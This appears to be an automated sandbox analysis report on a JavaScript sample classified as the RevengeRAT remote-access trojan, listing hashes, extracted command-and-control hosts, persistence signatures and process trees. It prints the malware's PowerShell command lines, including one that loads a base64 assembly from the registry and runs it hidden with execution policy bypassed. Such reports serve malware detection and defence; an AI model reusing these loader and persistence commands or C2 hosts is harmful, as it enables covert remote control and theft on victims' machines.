Analysis
-
max time kernel
159s -
max time network
167s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
24/12/2023, 22:59
Static task
static1
Behavioral task
behavioral1
Sample
17a713ee3f40af5d8379f6555a0c117b.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
17a713ee3f40af5d8379f6555a0c117b.js
Resource
win10v2004-20231215-en
General
-
Target
17a713ee3f40af5d8379f6555a0c117b.js
-
Size
32KB
-
MD5
17a713ee3f40af5d8379f6555a0c117b
-
SHA1
39a711b37c60b3a5c21087b5c5d579aeb43f1c02
-
SHA256
85303c6d78b4443b9df6e374924836a19ed824e0338632353e6b939aa8cc311f
-
SHA512
20a5010eaa1a40e70f864c0f90f25e3330af69d15a7ae57e18dc1ef39633599c2df0c84f04f29af55cb7f7358bba4d0ddeacf4cde7b63f9438e333fc8ddf610e
-
SSDEEP
768:NeNlC9F/C01WZ2b7BJyNo3pqRVtDab3mzcDeZT:NcCv/ZhJookR0Wzcu
Malware Config
Extracted
revengerat
Office
workwinrarhost.ddns.com.br:333
office.minhaempresa.tv:333
RV_MUTEX-ViGGjjtnxDpnFw
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
RevengeRat Executable 2 IoCs
resource yara_rule behavioral2/memory/416-22-0x00000209E32D0000-0x00000209E32DA000-memory.dmp revengerat behavioral2/memory/832-35-0x0000018A3AEC0000-0x0000018A3AED0000-memory.dmp revengerat -
Blocklisted process makes network request 16 IoCs
flow pid Process 31 416 powershell.exe 45 416 powershell.exe 47 416 powershell.exe 72 416 powershell.exe 82 416 powershell.exe 91 416 powershell.exe 103 416 powershell.exe 115 416 powershell.exe 153 416 powershell.exe 164 416 powershell.exe 172 416 powershell.exe 179 416 powershell.exe 188 416 powershell.exe 195 416 powershell.exe 205 416 powershell.exe 210 416 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Office.vbs powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\17a713ee3f40af5d8379f6555a0c117b.js powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Office = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 416 powershell.exe 832 powershell.exe 832 powershell.exe 416 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 416 powershell.exe Token: SeDebugPrivilege 832 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 540 wrote to memory of 832 540 wscript.exe 90 PID 540 wrote to memory of 832 540 wscript.exe 90 PID 540 wrote to memory of 416 540 wscript.exe 91 PID 540 wrote to memory of 416 540 wscript.exe 91
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\17a713ee3f40af5d8379f6555a0c117b.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\17a713ee3f40af5d8379f6555a0c117b.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\17a713ee3f40af5d8379f6555a0c117b.js'))"2⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"2⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:416
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82